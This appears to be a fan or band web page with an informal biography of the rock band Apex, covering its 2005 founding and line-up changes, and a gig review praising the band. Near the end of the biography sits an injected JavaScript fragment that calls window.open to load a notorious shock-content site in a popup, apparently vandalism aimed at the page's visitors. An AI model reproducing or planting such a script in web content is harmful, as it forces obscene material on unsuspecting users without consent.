Apex Biography:
Chris and Mark first started Apex in July 2005. They started playing guitar together, as an attempt to make Vanquish, the band in which chris was the vocalist for, good (They turned the Guitar mark had into a guibass). After they played guitar for a while they came up with 2 songs between them and they realised they were good. That day, they played on top of Chris's roof, and knew that they had started something good. The next day, they made the name Apex.About a week later, they realised that they needed a Bass instead of using a guitar tuned down. With the lack of funds they always have they had to buy a gear4music bass between them. It was the worst bass ever. Fortunately, about 2 days later, this guy gave Mark his old bass.
Chris and Mark played with guitar, bass, and vocals for a while. They wanted to play in the talent show and obviously they needed a drummer for it. Originally, Mark's brother, Paul was going to do it, but he was already in an act, so they asked a friend called Chris Kingshott, who had previously been drumming for The Broken. He worked so well with the band that they decided to have him as the permenant drummer, and so the full line up of Apex was complete.
After an extended break, the band decided to reconvine and pick up where they left off. They began playing through the old music and started on some new material. With the new era of apex beginning they decided to make a change, bringing in a new member with Jack Willmott on drums.
Following a brief period of including Jack Willmott on drums, he left to persue his own project, 'Spacejunkie'. Fish was brought back into the band in his place as a last minute replacement for a couple of gigs. After the first show with Fish, he decided to return to the band permently. At the same time, a local guitarist, commonly known as 'Bujj' joined Apex for the night, and just as Fish was kept in the band, Apex felt that Bujj also contributed alot to the band's sound, and was asked to stay, as he added a somewhat missing edge to music.
Jack then came back to the band, when Fish was unable to do a gig, and took his place in Apex once again. .. type="text/javascript" window.open('http://2girls1cup.com','popUpWindow','height=50 0,width=400,left=100, top=100,resizable=yes,scrollbars=yes,toolbar=yes,menubar=no, location=no,directories=no, status=yes'); ..
Keith - Bedford Metal Gig Review:
"One year older than the previous band and much more professional looking - The following band with influences from Zeppelin, Police, Nirvana, RATM and Sabbath were next, formed July 2005 playing on the singers roof gaining their name APEX with a singer so good but understates himself while talking to the crowd between songs - an almost trademark of the band now; - "Erm yea OK right, were Apex, erm…. yea" I thought his grunge like vocals were really well suited to their Led Zep cover. I love the way they get straight on with one song after another to get more songs in to their set. Their over all sound has a fantastic range of mellow and relaxing sounds mixed with a thunderous roar of drums, vocs and guitar bursts that connects well and sounds so good when they get in to their stride, making up for the slow plodding parts of their rather static set, saving it for the ending, it would seem for the thrashing round and beating the guitar up at the end. A great band and one I like putting on a lot."
